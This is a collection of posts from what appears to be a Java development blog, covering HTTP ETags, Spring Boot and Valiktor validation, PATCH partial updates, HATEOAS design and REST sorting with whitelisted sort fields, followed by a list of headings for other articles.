ETags can be generated in weak and strong variants. Weak ETags must be prefixed by W/.

Here are a few example ETags:

Weak ETags:


ETag: W/"abcd"
ETag: W/"123"

Strong ETags:


ETag: "a915ecb02a9136f8cfc0c2c5b2129c4b"
ETag: "ngl7Kfe73Mta"

Note that the ETag must be placed withing double quotes, so the shown quotes are not optional.

Besides concurrency control, preconditions are often used for caching and bandwidth reduction. In these situations weak validators can be good enough. For concurrency control in REST APIs strong validators are usually preferable.

Note that using Last-Modified and If-Unmodified-Since headers is considered weak because of the limited precision. We cannot be sure that the server state has been changed by another request in the same second. However, it depends on the number of concurrent update requests you expect if this is an actual problem.

Computing ETags

Strong ETags have to be unique for all versions of all representations for a particular resource. For example, JSON and XML representations of the same resource should have different ETags.

Generating and validating strong ETags can be a bit tricky. For example, assume we generate an ETag by hashing a JSON representation of a resource before sending it to the client. To validate the ETag for an update request we now have to load the resource, convert it to JSON and then hash the JSON representation.

In the best case resources contain an implementation-specific field that tracks changes. This can be a precise last modification date or some form of internal revision number. For example, when using database frameworks like Java Persistence API (JPA) with optimistic locking we might already have a version field that increases with every change.

We can then compute an ETag by hashing the resource id, the media-type (e.g. application/json) together with the last modification date or the revision number.

HTTP status codes and execution order

When working with preconditions, two HTTP status codes are relevant:

412 - Precondition failed indicates that one or more preconditions evaluated to false on the server (e.g. because the resource state has been changed on the server)
428 - Precondition required has been added in RFC 6585 and indicates that the server requires the request to be conditional. The server should return this status code if an update request does not contain a expected preconditions

RFC 7232 also defines the evaluation order for HTTP 412 (Precondition failed):

[..] a recipient cache or origin server MUST evaluate received request preconditions after it has successfully performed its normal request checks and just before it would perform the action associated with the request method. A server MUST ignore all received preconditions if its response to the same request without those conditions would have been a status code other than a 2xx (Successful) or 412 (Precondition Failed). In other words, redirects and failures take precedence over the evaluation of preconditions in conditional requests.

This usually results in the following processing order of an update request:

Before evaluating preconditions, we check if the request fulfills all other requirements. When this is not the case, we respond with a standard 4xx status code. This way we make sure that other errors are not suppressed by the 412 status code.

Interested in more REST related articles? Have a look at my REST API design page.

Validation in Spring Boot applications

2021-02-02T23:09:43Z

Validation in Spring Boot applications can be done in many different ways. Depending on your requirements some ways might fit better to your application than others. In this post we will explore the usual options to validate data in Spring Boot applications.

Validation is done by using the Bean Validation API. The reference implementation for the Bean Validation API is Hibernate Validator.

All required dependencies are packaged in the Spring Boot starter POM spring-boot-starter-validation. So usually all you need to get started is the following dependency:


<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-validation</artifactId>
</dependency>

Validation constraints are defined by annotating fields with appropriate Bean Validation annotations. For example:


public class Address {

    @NotBlank
    @Size(max = 50)
    private String street;

    @NotBlank
    @Size(max = 50)
    private String city;

    @NotBlank
    @Size(max = 10)
    private String zipCode;
    
    @NotBlank
    @Size(max = 3)
    private String countryCOde;

    // getters + setters
}

I think these annotations are quite self-explanatory. We will use this Address class in many of the following examples.

You can find a complete list of build in constraint annotations in the Bean Validation documentation. Of course you can also define you own validation constraints by creating a custom ConstraintValidator.

Defining validation constraints is only one part. Next we need to trigger the actual validation. This can be done by Spring or by manually invoking a Validator. We will see both approaches in the next sections.

Validating incoming request data

When building a REST API with Spring Boot it is likely you want to validate incoming request data. This can be done by simply adding the @Valid Annotation to the @RequestBody method parameter. For example:


@RestController
public class AddressController {

    @PostMapping("/address")
    public void createAddress(@Valid @RequestBody Address address) {
        // ..
    }
}

Spring now automatically validates the passed Address object based on the previously defined constraints.

This type of validation is usually used to make sure the data sent by the client is syntactically correct. If the validation fails the controller method is not called and a HTTP 400 (Bad request) response is returned to the client. More complex business specific validation constraints should typically be checked later in the business layer.

Persistence layer validation

When using a relational database in your Spring Boot application, it is likely that you are also using Spring Data and Hibernate. Hibernate comes with supports for Bean Validation. If your entities contain Bean Validation annotations, those are automatically checked when persisting an entity.

Note that the persistence layer should definitely not be the only location for validation. If validation fails here, it usually means that some sort of validation is missing in other application components. Persistence layer validation should be seen as the last line of defense. In addition to that, the persistence layer is usually too late for business related validation.

Method parameter validation

Another option is the method parameter validation provided by Spring. This allows us to add Bean Validation annotations to method parameters. Spring then uses an AOP interceptor to validate the parameters before the actual method is called.

For example:


@Service
@Validated
public class CustomerService {

    public void updateAddress(
            @Pattern(regexp = "\\w{2}\\d{8}") String customerId,
            @Valid Address newAddress
    ) {
        // ..
    }
}

This approach can be useful to validate data coming into your service layer. However, before committing to this approach you should be aware of its limitations as this type of validation only works if Spring proxies are involved. See my separate post about Method parameter validation for more details.

Note that this approach can make unit testing harder. In order to test validation constraints in your services you now have to bootstrap a Spring application context.

Triggering Bean Validation programmatically

In the previous validation solutions the actual validation is triggered by Spring or Hibernate. However, it can be quite viable to trigger validation manually. This gives us great flexibility in integrating validation into the appropriate location of our application.

We start by creating a ValidationFacade bean:


@Component
public class ValidationFacade {

    private final Validator validator;

    public ValidationFacade(Validator validator) {
        this.validator = validator;
    }

    public <T> void validate(T object, Class<?>... groups) {
        Set<ConstraintViolation<T>> violations = validator.validate(object, groups);
        if (!violations.isEmpty()) {
            throw new ConstraintViolationException(violations);
        }
    }
}

This bean accepts a Validator as constructor parameter. Validator is part of the Bean Validation API and responsible for validating Java objects. An instance of Validator is automatically provided by Spring, so it can be injected into our ValidationFacade.

Within the validate(..) method we use the Validator to validate a passed object. The result is a Set of ConstraintViolations. If no validation constraints are violated (= the object is valid) the Set is empty. Otherwise, we throw a ConstraintViolationException.

We can now inject our ValidationFacade into other beans. For example:


@Service
public class CustomerService {

    private final ValidationFacade validationFacade;

    public CustomerService(ValidationFacade validationFacade) {
        this.validationFacade = validationFacade;
    }

    public void updateAddress(String customerId, Address newAddress) {
        validationFacade.validate(newAddress);
        // ...
    }
}

To validate an object (here newAddress) we simply have to call the validate(..) method of ValidationFacade. Of course we could also inject the Validator directly in our CustomerService. However, in case of validation errors we usually do not want to deal with the returned Set of ConstraintViolations. Instead it is likely we simply want to throw an exception, which is exactly what ValidationFacade is doing.

Often this is a good approach for validation in the service/business layer. It is not limited to method parameters and can be used with different types of objects. For example, we can load an object from the database, modify it and then validate it before we continue.

This way is also quite good to unit test as we can simply mock ValidationFacade. In case we want real validation in unit tests, the required Validator instance can be created manually (as shown in the next section). Both cases do not require to bootstrap a Spring application context in our tests.

Validating inside business classes

Another approach is to move validation inside your actual business classes. When doing Domain Driven Design this can be a good fit. For example, when creating an Address instance the constructor can make sure we are not able to construct an invalid object:


public class Address {

    @NotBlank
    @Size(max = 50)
    private String street;

    @NotBlank
    @Size(max = 50)
    private String city;

    ...
    
    public Address(String street, String city) {
        this.street = street;
        this.city = city;
        ValidationHelper.validate(this);
    }
}

Here the constructor calls a static validate(..) method to validate the object state. This static validate(..) methods looks similar to the previously shown method in ValidationFacade:


public class ValidationHelper {

    private static final Validator validator = Validation.buildDefaultValidatorFactory().getValidator();

    public static <T> void validate(T object, Class<?>... groups) {
        Set<ConstraintViolation<T>> violations = validator.validate(object, groups);
        if (!violations.isEmpty()) {
            throw new ConstraintViolationException(violations);
        }
    }
}

The difference here is that we do not retrieve the Validator instance by Spring. Instead, we create it manually by using:


Validation.buildDefaultValidatorFactory().getValidator()

This way we can integrate validation directly into domain objects without relying on someone outside to validate the object.

Summary

We saw different ways to deal with validation in Spring Boot applications. Validating incoming request data is good to reject nonsense as early as possible. Persistence layer validation should only be used as additional layer of safety. Method validation can be quite useful, but make sure you understand the limitations. Even if triggering Bean Validation programmatically takes a bit more effort, it is usually the most flexible way.

You can find the source code for the shown examples on GitHub.

REST: Partial updates with PATCH

2021-01-17T21:14:32Z

In previous posts we learned how to update/replace resources using the HTTP PUT operation. We also learned about the differences between POST, PUT and PATCH. In this post we will now see how to perform partial updates with the HTTP PATCH method.

Before we start, let's quickly check why partial updates can be useful:

Simplicity - If a client only wants to update a single field, a partial update request can be simpler to implement.
Bandwidth - If your resource representations are quite large, partial updates can reduce the amount of bandwidth required.
Lost updates - Resource replacements with PUT can be susceptible for the lost update problem. While partial updates do not solve this problem, they can help reducing the number of possible conflicts.

The PATCH HTTP method

Other like PUT or POST the PATCH method is not part of the original HTTP RFC. It has later been added via RFC 5789. The PATCH method is neither safe nor idempotent. However, PATCH it is often used in an idempotent way.

A PATCH request can contain one or more requested changes to a resource. If more than one change is requested the server must ensure that all changes are applied atomically. The RFC says:

The server MUST apply the entire set of changes atomically and never provide ([..]) a partially modified representation. If the entire patch document cannot be successfully applied, then the server MUST NOT apply any of the changes.

The request body for PATCH is quite flexible. The RFC only says the request body has to contain instructions on how the resource should be modified:

With PATCH, [..], the enclosed entity contains a set of instructions describing how a resource currently residing on the origin server should be modified to produce a new version.

This means we do not have to use the same resource representation for PATCH requests as we might use for PUT or GET requests. We can use a completely different Media-Type to describe the resource changes.

PATCH can be used in two common ways which both have their own pros and cons. We will look into both of them in the next sections.

Using the standard resource representation to send changes (JSON Merge Patch)

The most intuitive way to use PATCH is to keep the standard resource representation that is used in GET or PUT requests. However, with PATCH we only include the fields that should be changed.

Assume we have a simple product resource. The response of a simple GET request might look like this:


GET /products/123


{
    "name": "Cool Gadget",
    "description": "It looks very cool",
    "price": 4.50,
    "dimension": {
        "width": 1.3,
        "height": 2.52,
        "depth": 0.9
    }
    "tags": ["cool", "cheap", "gadget"]
}

Now we want to increase the price, remove the cheap tag and update the product width. To accomplish this, we can use the following PATCH request:


PATCH /products/123
{
    "price": 6.20,
    "dimension": {
        "width": 1.35
    }
    "tags": ["cool", "gadget"]
}

Fields not included in the request should stay unmodified. In order to remove an element from the tags array we have to include all remaining array elements.

This usage of PATCH is called JSON Merge Patch and is defined in RFC 7396. You can think of a PUT request that only uses a subset of fields. Patching this way makes PATCH requests usually idempotent.

JSON Merge Patch and null values

There is one caveat with JSON Merge Patch you should be aware of: The processing of null values.

Assume we want to remove the description of the previously used product resource. The PATCH request looks like this:


PATCH /products/123
{
    "description": null
}

To fulfill the client's intent the server has to differentiate between the following situations:

The description field is not part of the JSON document. In this case, the description should stay unmodified.
The description field is part of the JSON document and has the value null. Here, the server should remove the current description.

Be aware of this differentiation when using JSON libraries that map JSON documents to objects. In strongly typed programming languages like Java it is likely that both cases produce the same result when mapped to a strongly typed object (the description field might result in being null in both cases).

So, when supporting null values, you should make sure you can handle both situations.

Using a separate Patch format

As mentioned earlier it is fine to use a different media type for PATCH requests.

Again we want to increase the price, remove the cheap tag and update the product width. A different way to accomplish this, might look like this:


PATCH /products/123
{
    "$.price": {
        "action": "replace",
        "newValue": 6.20
    },
    "$.dimension.width": {        
        "action": "replace",
        "newValue": 1.35
    },
    "$.tags[?(@ == 'cheap')]": {
        "action": "remove"
    }
}

Here we use JSONPath expressions to select the values we want to change. For each selected value we then use a small JSON object to describe the desired action.

To replace simple values this format is quite verbose. However, it also has some advantages, especially when working with arrays. As shown in the example we can remove an array element without sending all remaining array elements. This can be useful when working with large arrays.

JSON Patch

A standardized media type to describe changes using JSON is JSON Patch (described in RFC 6902). With JSON Patch our request looks this:


PATCH /products/123
Content-Type: application/json-patch+json

[
    { 
        "op": "replace", 
        "path": "/price", 
        "value": 6.20
    },
    {
        "op": "replace",
        "path": "/dimension/width",
        "value": 1.35
    },
    {
        "op": "remove", 
        "path": "/tags/1"
    }
]

This looks a bit similar to our previous solution. JSON Patch uses the op element to describe the desired action. The path element contains a JSON Pointer (yet another RFC) to select the element to which the change should be applied.

Note that the current version of JSON Patch does not support removing an array element by value. Instead, we have to remove the element using the array index. With /tags/1 we can select the second array element.

Before using JSON Patch, you should evaluate if it fulfills your needs and if you are fine with its limitations. In the issues of the GitHub repository json-patch2 you can find a discussion about a possible revision of JSON Patch.

If you are using XML instead of JSON you should have a look at XML Patch (RFC 5261) which works similar, but uses XML.

The Accept-Patch header

The RFC for HTTP PATCH also defines a new response header for HTTP OPTIONS requests: Accept-Patch. With Accept-Patch the server can communicate which media types are supported by the PATCH operation for a given resource. The RFC says:

Accept-Patch SHOULD appear in the OPTIONS response for any resource that supports the use of the PATCH method.

An example HTTP OPTIONS request/response for a resource that supports the PATCH method and uses JSON Patch might look like this:

Request:


OPTIONS /products/123

Response:


HTTP/1.1 200 OK
Allow: GET, PUT, POST, OPTIONS, HEAD, DELETE, PATCH
Accept-Patch: application/json-patch+json

Responses to HTTP PATCH operations

The PATCH RFC does not mandate how the response body of a PATCH operation should look. It is fine to return the updated resource. It is also fine to leave the response body empty.

The server responds to HTTP PATCH requests usually with one of the following HTTP status codes:

204 (No Content) - Indicates that the operation has been completed successfully and no data is returned
200 (Ok) - The operation has been completed successfully and the response body contains more information (for example the updated resource).
400 (Bad request) - The request body is malformed and cannot be processed.
409 (Conflict) - The request is syntactically valid but cannot be applied to the resource. For example it can be used with JSON Patch if the element selected by a JSON pointer (the path field) does not exist.

Summary

The PATCH operation is quite flexible and can be used in different ways. JSON Merge Patch uses standard resource representations to perform partial updates. JSON Patch however uses a separate PATCH format to describe the desired changes. it also fine to come up with a custom PATCH format. Resources that support the PATCH operation should return the Accept-Patch header for OPTIONS requests.

HATEOAS without links

2020-12-01T12:50:13Z

Yes, I know this title sounds stupid, but could not find something that fits better. So let me explain why I think that links in HATEOAS APIs are not always that useful.

If you don't know what HATEOAS is, I recommend reading my Introduction to Hypermedia REST APIs first.

REST APIs with HATEOAS support provide two main features for decoupling client and server:

Hypermedia avoids that the client needs to hard-code and construct URIs. This helps the server to evolve the REST-API in the future.
The availability of links tells the client which operations can be performed on a resource. This avoids that server logic needs to be duplicated on the client.
For example, assume the client needs to decide if a payment button should be displayed next to an order. The logic for this might be:
```

if (order.status == OPEN and order.paymentDate == null) {
    show payment button
}
```
With HATEOAS the client needs not to know this logic. The check simply becomes:
```

if (order.links.getByRel("payment") != null) {
    show payment button
}
```
The server can now change the rule that decides when an order can be paid without requiring a client update.

How useful these features are depends on your application, your system architecture and your clients.

The second point might not be a big deal for applications that mostly use CRUD operations. However, it can be very useful if your REST API is serving a more complex domain.

The first point depends on your clients and to a certain degree on your overall system architecture. If you provide an API for public clients it is very likely that at least some clients will hard-code request URIs and not use the links you provide. In this case, you loose the ability to evolve your API without breaking (at least some) clients.

If your clients do not use your API responses directly and instead expose their own API it is also unlikely that they will follow the links you return. For example, this can easily happen when using the Backend for Frontend pattern.

Consider the following example system architecture:

A Backend Service is used by two other systems. Both systems provide user-interfaces which communicate with system specific backends. REST is used for all communication.

Assume a user performs an action using the Android-App (1). The App sends a request to the Mobile-Backend (2). Then, the Mobile-Backend might communicate with the Backend-Service (3) to perform the requested action. The Mobile-Backend can also pre-process, map or aggregate data retrieved from the Backend-Service before sending a response back to the Anroid-App.

Now back to HATEOAS.

If the Backend-Service (3) in this example architecture provides a Hypermedia REST API, clients can barely make use of HATEOAS related links.

Let's look at a sequence diagram showing the system communication to see the problem:

The Backend-Service (3) provides an API-Entrypoint which returns a list of all available operations with their request URIs. The Mobile-Backend (2) sends a request to this API-Entrypoint in regular intervals and caches the link list locally.

Now assume a user of the Android-App (1) wants to access a specific order. To retrieve the required information the Anroid-App sends a request to the Mobile-Backend (2). The URI for this request might have been retrieved from the Mobile-Backends API-Entrypoint previously (not shown).

To retrieve the requested order from the Backend-Service the Mobile-Backend uses the order-details link from the cached link list. The Backend-Service returns a response with HATEOAS links. Here, the order-payment link indicates that the order can be paid. The Mobile-Backend now transforms the response to its own return format and sends it back to the Android-App.

The Mobile-Backend might also return a HATEOAS response. So link URIs from the Backend-Service need to be mapped to the appropriate Mobile-Backend URIs. Therefore the Mobile-Backend checks if an order-payment link is present in the Backend-Service response. If this is the case it adds an order-payment link to its own response.

Note the Mobile-Backend is only using the relations (rel fields) of the Backend-Service response. The URIs are discarded.

Now the user wants to pay the order. The Android-App uses the previously retrieved order-payment link to send a request to the Mobile-Backend. The Mobile-Backend now has lost the Context of the previous Backend-Service response. So it has to look up the order-payment link in the cached link list. The process continues in the same way as the previous request

In this example the Android-App is able to make use of HATEOAS related links. However, the Mobile-Backend cannot use the link URIs returned by Backend-Service responses (except for the API entry-point). If the Mobile-Backend is providing HATEOAS features the link relations from the Backend-Service might be useful. The URIs for Backend-Service requests are always looked up from the cached API-Entrypoint response.

Communicate actions instead of links

Unfortunately link construction is not always that simple and can take some extra time. This time is wasted if you know that your clients won't use these links.

Probably the easiest way to avoid logic duplication on the client is to ignore links and use a simple actions array in REST responses:


GET /orders/123
{
    "id": 123,
    "price": "$41.24 USD"
    "status": "open",
    "paymentDate": null,
    "items": [
        ...
    ]
    "actions": ["order-cancel", "order-payment", "order-update"]
}

This way we can communicate possible actions without the need of constructing links. In this case the response tells us that the client is able to perform cancel, payment and update operations.

Note that this might not even increase coupling between the client and the server. Clients can still look up URIs for those actions in the API entry point without the need of hard-coding URIs.

An alternative is to use standard link elements and just skip the href attribute:


GET /orders/123
{
    "id": 123,
    "price": "$41.24 USD"
    "status": "open",
    "paymentDate": null,
    "items": [
        ...
    ]
    "links": [
        { "rel": "order-cancel" },
        { "rel": "order-payment" },
        { "rel": "order-update" },
    ]
}

However, it might be a bit confusing to return a links element without links URIs.

Obviously, you are leaving the standard path with both described ways. On the other side, if you don't need links you probably don't want to use a standardized HATEOAS response format (like HAL) either.

Validation in Kotlin: Valiktor

2020-11-19T12:42:51Z

Bean Validation is the Java standard for validation and can be used in Kotlin as well. However, there are also two popular alternative libraries for validation available in Kotlin: Konform and Valiktor. Both implement validation in a more kotlin-like way without annotations. In this post we will look at Valiktor.

Getting started with Valiktor

First we need to add the Valiktor dependency to our project.

For Maven:


<dependency>
  <groupId>org.valiktor</groupId>
  <artifactId>valiktor-core</artifactId>
  <version>0.12.0</version>
</dependency>

For Gradle:


implementation 'org.valiktor:valiktor-core:0.12.0'

Now let's look at a simple example:


class Article(val title: String, val text: String) {
    init {
        validate(this) {
            validate(Article::text).hasSize(min = 10, max = 10000)
            validate(Article::title).isNotBlank()
        }
    }
}

Within the init block we call the validate(..) function to validate the Article object. validate(..) accepts two parameters: The object that should be validated and a validation function. In the validation function we define validation constraints for the Article class.

Now we try to create an invalid Article object with:


Article(title = "", text = "some article text")

This causes a ConstraintViolationException to be thrown because the title field is not allowed to be empty.

More validation constraints

Let's look at a few more example validation rules:


validate(this) {
    
    // Multiple constraints can be chained
    validate(Article::authorEmail)
            .isNotBlank()
            .isEmail()
            .endsWith("@cool-blog.com")

    // Nested validation
    // Checks that Article.category.name is not blank
    validate(Article::category).validate {
        validate(Category::name).isNotBlank()
    }

    // Collection validation
    // Checks that no Keyword in the keywords collection has a blank name
    validate(Article::keywords).validateForEach {
        validate(Keyword::name).isNotBlank()
    }

    // Conditional validation
    // if the article is published the permalink field cannot be blank
    if (isPublished) {
        validate(Article::permalink).isNotBlank()
    }
}

Validating objects from outside

In the previous examples the validation constraints are implemented within the objects init block. However, it is also possible to perform the validation outside the class.

For example:


val person = Person(name = "")

validate(person) {
    validate(Person::name).isNotBlank()
}

This validates the previously created Person object and causes a ConstraintViolationException to be thrown (because name is empty)

Creating a custom validation constraint

To define our own validation methods we need two things: An implementation of the Constraint interface and an extension method. The following snippet shows an example validation method to make sure an Interable<T> does not contain duplicate elements:


object NoDuplicates : Constraint

fun <E, T> Validator<E>.Property<Iterable<T>?>.hasNoDuplicates()
        = this.validate(NoDuplicates) { iterable: Iterable<T>? ->

    if (iterable == null) {
        return@validate true
    }

    val list = iterable.toList()
    val set = list.toSet()
    set.size == list.size
}

This adds a method named hasNoDuplicates() to Validator<E>.Property<Iterable<T>?>. So this method can be called for fields of type Iterable<T>. The extension method is implemented by calling validate(..) with our Constraint and passing a validation function.

In the validation function we implement the actual validation. In this example we simply convert the Iterable to a List and then the List to a Set. If duplicate elements are present both collections have a different size (a Set does not contain duplicate elements).

We can now use our hasNoDuplicates() validation method like this:


class Article(val keywords: List<Keyword>) {
    init {
        validate(this) {
            validate(Article::keywords).hasNoDuplicates()
        }
    }
}

Conclusion

Valiktor is an interesting alternative for validation in Kotlin. It provides a fluent DSL to define validation rules. Thoes rules are defined in standard Kotlin code (and not via annotations) which makes it easy to add conditional logic. Valiktor comes with many predefined validation constraints. Custom constraints easily be implemented using extension functions.

REST: Sorting collections

2020-11-06T12:24:46Z

When building a RESTful API we often want to give consumers the option to order collections in a specific way (e.g. ordering users by last name). If our API supports pagination this can be quite an important feature. When clients only query a specific part of a collection they are unable to order elements on the client.

Sorting is typically implemented via Query-Parameters. In the next section we look into common ways to sort collections and a few things we should consider.

Sorting by single fields

The easiest way is to allow sorting only by a single field. In this case, we just have to add two query parameters for the field and the sort direction to the request URI.

For example, we can sort a list of products by price using:


GET /products?sort=price&order=asc

asc and desc are usually used to indicate ascending and descending ordering.

We can reduce this to a single parameter by separating both values with a delimiter. For example:


GET /products?sort=price:asc

As we see in the next section, this makes it easier for us to support sorting by more than one field.

Sorting by multiple fields

To support sorting by multiple fields we can simply use the previous one-parameter way and separate fields by another delimiter. For example:


GET /products?sort=price:asc,name:desc

It is also possible to use the same parameter multiple times:


GET /products?sort=price:asc&sort=name:desc

Note that using the same parameter multiple times is not exactly described in the HTTP RFC. However, it is supported by most web frameworks (see this discussion on Stackoverflow).

Checking sort parameters against a white list

Sort parameters should always be checked against a white list of sortable fields. If we pass sort parameters unchecked to the database, attackers can come up with requests like this:


GET /users?sort=password:asc

Yes, this would possibly not be a real issue if passwords are correctly hashed. However, I think you get the point. Even if the response does not contain the field we use for ordering, the simple order of collection elements could lead to unintended data exposure.

Programming and Stuff - Michael Scharhag's Java development blog

URI design suggestions

Avoid case sensitivity, use lower case letters

Prefer hyphens over spaces and underscores

Use hyphens over camel case

Avoid trailing slashes

Avoid media types and file formats in URIs

URIs describe resources not operations

Be consistent with plural and singular in resource names

Do not use query parameters to alter state

URIs are hierarchical

Constructing a malicious YAML file for SnakeYAML (CVE-2022-1471)

Parsing YAML files with SnakeYAML

Mapping YAML content to objects

Where is the security issue?

Loading remote code via URLClassLoader

Using ScriptEngineManager to run code for us

But what content must be provided in the remote jar file?

Constructing a malicious YAML file

A standardized error format for HTTP responses

RFC 7807: Problem Details for HTTP APIs

Problem types

Extension members

Conclusion

HTTP - Content negotiation

Server-driven and agent-driven content negotiation

Accept headers

What if the server cannot return an acceptable response?

Content negotiation in REST APIs

Interested in more REST related articles? Have a look at my REST API design page.

Avoid leaking domain logic

Using more specific domain operations

Media types and the Content-Type header

The Content-Type header

From layers to onions and hexagons

Classic layers

What is the problem with this?

Abstraction with interfaces

In and out

The onion architecture

What to remember?

Further reading

File down- and uploads in RESTful web services

Think about the operation you want to express

Mixing files and metadata

Embedding Base64 encoded files in JSON or XML

Mixing media-types with multipart requests

Interested in more REST related articles? Have a look at my REST API design page.

Kotlin: Type conversion with adapters

Creating an extension function

Providing conversion rules with adapters

Searching for an appropriate adapter

Example usage

Making POST and PATCH requests idempotent

Using a unique business constraint

Using ETags

Using a separate idempotency key

Summary

Interested in more REST related articles? Have a look at my REST API design page.

Providing useful API error messages with Spring Boot

Client and security perspectives

How to build a useful error response in a Spring Boot application?

Testing error responses

Summary

Supporting bulk operations in REST APIs

Expressing multiple operations within the request body

Multipart Content-Type for the rescue?

Bulk operations on REST resources

Partially updating collections

Which HTTP status code is appropriate for responses to bulk requests?

Summary

Interested in more REST related articles? Have a look at my REST API design page.

Looking into the JDK 16 vector API

Why vector operations?

Enabling the vector incubator module (jdk.incubator.vector)

Implementing a simple vector operation

Working with loops

Summary

Kotlin dependency injection with Koin

Getting started with Koin